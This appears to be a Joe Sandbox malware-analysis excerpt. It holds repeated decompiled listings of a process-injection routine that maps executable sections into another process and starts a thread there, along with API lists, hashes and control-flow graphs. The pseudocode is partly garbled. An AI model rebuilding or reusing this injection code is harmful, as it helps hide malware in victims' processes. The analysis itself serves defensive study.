                            										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                            										__eflags = _t198;
                            										while(1) {
                            											__eflags =  *_t198;
                            											if( *_t198 == 0) {
                            												break;
                            											}
                            											_t180 =  *_t198;
                            											_t198 = _t198 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t170;
                            												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t188);
                            										__eflags = 0;
                            										_t109 = _t202 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                            									} else {
                            										L57();
                            										_pop(_t181);
                            										_t182 = _t181 - 0x1892;
                            										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                            										L004012E3(_t128, _t228);
                            										0x33(_t182 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t205;
                            				_push(0x392);
                            				_t157 = 0xf1;
                            				return L00401274(_t92, _t157, _t188, _t228);
			}

Instruction addresses of the decompiled lines above (decompiler gutter, in listing order):
0x004015ea 0x004015f4 0x004015fc 0x00401618 0x0040161d 0x00401622 0x0040162b 0x0040162d
0x0040162d 0x00401630 0x00401630 0x00401635 0x00000000 0x00000000 0x0040195b 0x0040195b
0x0040163b 0x0040163e 0x00401641 0x00401645 0x00401648 0x0040164c 0x00401652 0x00401655
0x00401657 0x0040165a 0x00401660 0x00401663 0x00401671 0x00401672 0x00401673 0x00401675
0x0040167b 0x0040169e 0x004016a1 0x004016a4 0x004016a7 0x004016ad 0x004016c2 0x004016c7
0x004016ca 0x004016cd 0x004016e5 0x004016e7 0x004016ea 0x00401703 0x00401705 0x0040170f
0x00401715 0x0040171b 0x0040171b 0x00401703 0x004016e5 0x0040171e 0x0040172a 0x0040172d
0x0040172f 0x00401744 0x00401757 0x0040175a 0x0040175d 0x00401775 0x0040177b 0x0040177e
0x00401795 0x00401797 0x0040179d 0x004017a2 0x004017a6 0x004017a7 0x004017a7 0x004017ce
0x004017d6 0x004017fd 0x00401809 0x00401813 0x00401822 0x0040182a 0x0040182f 0x00401838
0x00401841 0x0040184d 0x0040184f 0x00401853 0x00401854 0x0040185a 0x00401864 0x00401864
0x0040185c 0x0040185c 0x0040185c 0x0040186a 0x0040186b 0x00401870 0x0040187e 0x0040187e
0x0040187e 0x00401884 0x00401886 0x00401887 0x0040188b 0x004018f3 0x004018f7 0x00401902
0x00401902 0x00401905 0x00401905 0x00401908 0x00000000 0x00000000 0x0040190a 0x00401914
0x00401919 0x0040191b 0x00401920 0x0040192c 0x0040192c 0x0040192c 0x0040192e 0x0040192e
0x00401932 0x00401939 0x0040193b 0x0040193e 0x0040194e 0x0040188d 0x0040188d 0x00401892
0x00401893 0x004018a9 0x004018b8 0x004018c5 0x004018dc 0x004018ea 0x004018ea 0x0040188b
0x00401797 0x00401775 0x00401744 0x0040167b 0x0040196b 0x00401970 0x00401984 0x004019a2
0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                            • Instruction ID: 897f24c5fa4790511d5421a469eabb5bc73caab52430bd7d1b353843a9d98d60
                            • Opcode Fuzzy Hash: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                            • Instruction Fuzzy Hash: CB510BB4900245BBEF209F91CC48FEB7BB8FF85700F14016AF912BA2E5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
Control-flow graph nodes for E004015E0 (basic block: address range, API called, successor blocks):
• 141: 4015e0-4015ef -> 143, 144
• 143: 401603 -> 144
• 144: 4015f4-40162b (call 401274) -> 151, 152
• 151: 401630-401635 -> 154, 155
• 152: 40162d -> 151
• 154: 401956-40195e -> 151, 158
• 155: 40163b-40164c -> 159, 160
• 158: 401963-4019b3 (call 401274)
• 159: 401652-40167b -> 160, 167
• 160: 401954 -> 158
• 167: 401681-401698 NtDuplicateObject -> 160, 169
• 169: 40169e-4016c2 NtCreateSection -> 171, 172
• 171: 4016c4-4016e5 NtMapViewOfSection -> 172, 175
• 172: 40171e-401744 NtCreateSection -> 160, 176
• 175: 4016e7-401703 NtMapViewOfSection -> 172, 177
• 176: 40174a-40174e -> 160, 178
• 177: 401705-40171b -> 172
• 178: 401754-401775 NtMapViewOfSection -> 160, 181
• 181: 40177b-401797 NtMapViewOfSection -> 160, 184
• 184: 40179d (call 4017a2)
                            C-Code - Quality: 58%
                            			E004015E0(void* __esi, void* __eflags) {
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t133;
                            				signed int _t140;
                            				int _t141;
                            				void* _t158;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				signed int _t165;
                            				signed int _t166;
                            				void* _t167;
                            				intOrPtr* _t168;
                            				void* _t171;
                            				intOrPtr _t181;
                            				void* _t182;
                            				void* _t183;
                            				HANDLE* _t189;
                            				HANDLE* _t191;
                            				void* _t196;
                            				intOrPtr* _t199;
                            				void* _t202;
                            				void* _t203;
                            				void* _t205;
                            				intOrPtr* _t206;
                            				void* _t210;
                            				long _t225;
                            
                            				asm("bound edi, [eax+0x161d]");
                            				_push(0x392);
                            				_t206 = _t205 + 4;
                            				L00401274(0x161d, 0xf1, __esi, __eflags);
                            				_t128 =  *((intOrPtr*)(_t203 + 8));
                            				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                            				_t189 = _t203 - 0x60;
                            				 *_t189 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t189);
                            				_t91 =  *_t189;
                            				if(_t91 != 0) {
                            					_t133 = _t203 - 0x30;
                            					 *_t133 = _t91;
                            					_t133[1] = 0;
                            					_t189 = _t203 - 0x28;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t189, 0x18);
                            					 *_t189 = 0x18;
                            					_push(_t203 - 0x30);
                            					_push(_t189);
                            					_push(0x40);
                            					_push(_t203 - 0x10);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t203 - 8)) = 0;
                            						_t99 = _t203 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t191 = _t203 - 0x54;
                            						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t203 - 0x50);
                            							_t122 = _t203 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t203 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                            									_t202 =  *(_t203 - 0x44);
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t202, 0x104);
                            									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                            									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t203 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                            						_t189 = _t203 - 0x58;
                            						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
                            							 *_t46 =  *(_t203 - 0x50);
                            							_t103 = _t203 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t203 - 0x40;
                            								 *_t105 = 0;
                            								_t225 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
                            								if(_t225 == 0) {
                            									L23();
                            									if(_t225 == 0 && _t225 != 0) {
                            										asm("hlt");
                            										_push(_t206);
                            									}
                            									_push(0x2ea6);
                            									_t210 = _t206 + 4;
                            									_t162 = 0x2260;
                            									_t163 = _t162 << 5;
                            									_t164 = _t163 + 0x2260;
                            									asm("lodsb");
                            									_t165 = _t164;
                            									asm("loop 0xffffffc4");
                            									_t166 = _t165 ^ 0xad610a21;
                            									_t206 = _t210 - _t166;
                            									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                            									_t140 =  *(_t196 + 6) & 0x0000ffff;
                            									_push(_t196);
                            									_t167 = _t196;
                            									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                            										_t168 = _t167 + 0xf8;
                            										__eflags = _t168;
                            									} else {
                            										_t168 = _t167 + 0x108;
                            									}
                            									_push(_t140);
                            									_t141 =  *(_t168 + 0x10);
                            									if(_t141 != 0) {
                            										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t141);
                            										_t206 = _t206 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t189);
                            									_t229 =  *((intOrPtr*)(_t203 - 0x34));
                            									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                            										_push(_t189);
                            										_t171 = _t189[0xd] -  *(_t203 - 0x40);
                            										_t199 = _t189[0x28] +  *(_t203 - 0x48);
                            										__eflags = _t199;
                            										while(1) {
                            											__eflags =  *_t199;
                            											if( *_t199 == 0) {
                            												break;
                            											}
                            											_t181 =  *_t199;
                            											_t199 = _t199 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t171;
                            												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t189);
                            										__eflags = 0;
                            										_t109 = _t203 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
                            									} else {
                            										L56();
                            										_pop(_t182);
                            										_t183 = _t182 - 0x1892;
                            										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
                            										L004012E3(_t128, _t229);
                            										0x33(_t183 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t206;
                            				_push(0x392);
                            				_t158 = 0xf1;
                            				return L00401274(_t92, _t158, _t189, _t229);
			}

Instruction addresses of the decompiled lines above (decompiler gutter, in listing order; the listing is cut off at 0x004018c5 in the source):
0x004015e2 0x004015f4 0x004015fc 0x00401618 0x0040161d 0x00401622 0x0040162b 0x0040162d
0x0040162d 0x00401630 0x00401630 0x00401635 0x00000000 0x00000000 0x0040195b 0x0040195b
0x0040163b 0x0040163e 0x00401641 0x00401645 0x00401648 0x0040164c 0x00401652 0x00401655
0x00401657 0x0040165a 0x00401660 0x00401663 0x00401671 0x00401672 0x00401673 0x00401675
0x0040167b 0x0040169e 0x004016a1 0x004016a4 0x004016a7 0x004016ad 0x004016c2 0x004016c7
0x004016ca 0x004016cd 0x004016e5 0x004016e7 0x004016ea 0x00401703 0x00401705 0x0040170f
0x00401715 0x0040171b 0x0040171b 0x00401703 0x004016e5 0x0040171e 0x0040172a 0x0040172d
0x0040172f 0x00401744 0x00401757 0x0040175a 0x0040175d 0x00401775 0x0040177b 0x0040177e
0x00401795 0x00401797 0x0040179d 0x004017a2 0x004017a6 0x004017a7 0x004017a7 0x004017ce
0x004017d6 0x004017fd 0x00401809 0x00401813 0x00401822 0x0040182a 0x0040182f 0x00401838
0x00401841 0x0040184d 0x0040184f 0x00401853 0x00401854 0x0040185a 0x00401864 0x00401864
0x0040185c 0x0040185c 0x0040185c 0x0040186a 0x0040186b 0x00401870 0x0040187e 0x0040187e
0x0040187e 0x00401884 0x00401886 0x00401887 0x0040188b 0x004018f3 0x004018f7 0x00401902
0x00401902 0x00401905 0x00401905 0x00401908 0x00000000 0x00000000 0x0040190a 0x00401914
0x00401919 0x0040191b 0x00401920 0x0040192c 0x0040192c 0x0040192c 0x0040192e 0x0040192e
0x00401932 0x00401939 0x0040193b 0x0040193e 0x0040194e 0x0040188d 0x0040188d 0x00401892
0x00401893 0x004018a9 0x004018b8 0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                            • Instruction ID: 8306347d173e952d8899d3997cb349dcf7f01c905c4505a4b1f9f6e7b55dad69
                            • Opcode Fuzzy Hash: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                            • Instruction Fuzzy Hash: 7E5119B0900245BFEB209F91CC48FEBBBB8EF85700F14416AF911BB2A5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 186 4015ee-4015ef 188 401603 186->188 189 4015f4-40162b call 401274 186->189 188->189 196 401630-401635 189->196 197 40162d 189->197 199 401956-40195e 196->199 200 40163b-40164c 196->200 197->196 199->196 203 401963-4019b3 call 401274 199->203 204 401652-40167b 200->204 205 401954 200->205 204->205 212 401681-401698 NtDuplicateObject 204->212 205->203 212->205 214 40169e-4016c2 NtCreateSection 212->214 216 4016c4-4016e5 NtMapViewOfSection 214->216 217 40171e-401744 NtCreateSection 214->217 216->217 220 4016e7-401703 NtMapViewOfSection 216->220 217->205 221 40174a-40174e 217->221 220->217 222 401705-40171b 220->222 221->205 223 401754-401775 NtMapViewOfSection 221->223 222->217 223->205 226 40177b-401797 NtMapViewOfSection 223->226 226->205 229 40179d call 4017a2 226->229
                            C-Code - Quality: 58%
                            			E004015EE(void* __esi, void* __eflags) {
                            				void* _t85;
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t132;
                            				signed int _t139;
                            				int _t140;
                            				void* _t157;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				signed int _t165;
                            				void* _t166;
                            				intOrPtr* _t167;
                            				void* _t170;
                            				intOrPtr _t180;
                            				void* _t181;
                            				void* _t182;
                            				HANDLE* _t188;
                            				HANDLE* _t190;
                            				void* _t195;
                            				intOrPtr* _t198;
                            				void* _t201;
                            				void* _t202;
                            				void* _t204;
                            				intOrPtr* _t205;
                            				void* _t209;
                            				long _t224;
                            
                            				asm("lodsd");
                            				_push(0x392);
                            				_t205 = _t204 + 4;
                            				L00401274(_t85, 0xf1, __esi, __eflags);
                            				_t128 =  *((intOrPtr*)(_t202 + 8));
                            				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                            				_t188 = _t202 - 0x60;
                            				 *_t188 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                            				_t91 =  *_t188;
                            				if(_t91 != 0) {
                            					_t132 = _t202 - 0x30;
                            					 *_t132 = _t91;
                            					_t132[1] = 0;
                            					_t188 = _t202 - 0x28;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                            					 *_t188 = 0x18;
                            					_push(_t202 - 0x30);
                            					_push(_t188);
                            					_push(0x40);
                            					_push(_t202 - 0x10);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t202 - 8)) = 0;
                            						_t99 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t190 = _t202 - 0x54;
                            						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t202 - 0x50);
                            							_t122 = _t202 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t202 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            									_t201 =  *(_t202 - 0x44);
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                            									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                            									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                            						_t188 = _t202 - 0x58;
                            						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                            							 *_t46 =  *(_t202 - 0x50);
                            							_t103 = _t202 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t202 - 0x40;
                            								 *_t105 = 0;
                            								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                            								if(_t224 == 0) {
                            									L22();
                            									if(_t224 == 0 && _t224 != 0) {
                            										asm("hlt");
                            										_push(_t205);
                            									}
                            									_push(0x2ea6);
                            									_t209 = _t205 + 4;
                            									_t161 = 0x2260;
                            									_t162 = _t161 << 5;
                            									_t163 = _t162 + 0x2260;
                            									asm("lodsb");
                            									_t164 = _t163;
                            									asm("loop 0xffffffc4");
                            									_t165 = _t164 ^ 0xad610a21;
                            									_t205 = _t209 - _t165;
                            									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                            									_t139 =  *(_t195 + 6) & 0x0000ffff;
                            									_push(_t195);
                            									_t166 = _t195;
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_t167 = _t166 + 0xf8;
                            										__eflags = _t167;
                            									} else {
                            										_t167 = _t166 + 0x108;
                            									}
                            									_push(_t139);
                            									_t140 =  *(_t167 + 0x10);
                            									if(_t140 != 0) {
                            										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                            										_t205 = _t205 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t188);
                            									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_push(_t188);
                            										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                            										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                            										__eflags = _t198;
                            										while(1) {
                            											__eflags =  *_t198;
                            											if( *_t198 == 0) {
                            												break;
                            											}
                            											_t180 =  *_t198;
                            											_t198 = _t198 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t170;
                            												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t188);
                            										__eflags = 0;
                            										_t109 = _t202 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                            									} else {
                            										L55();
                            										_pop(_t181);
                            										_t182 = _t181 - 0x1892;
                            										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                            										L004012E3(_t128, _t228);
                            										0x33(_t182 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t205;
                            				_push(0x392);
                            				_t157 = 0xf1;
                            				return L00401274(_t92, _t157, _t188, _t228);
                            			}

                            0x004015ee
                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                            • Instruction ID: 6c2b391f055ddb0142fb10ad77502f624f49f79eb41efd18acee614c01c4bb16
                            • Opcode Fuzzy Hash: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                            • Instruction Fuzzy Hash: CF5109B4900245BFEF219F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
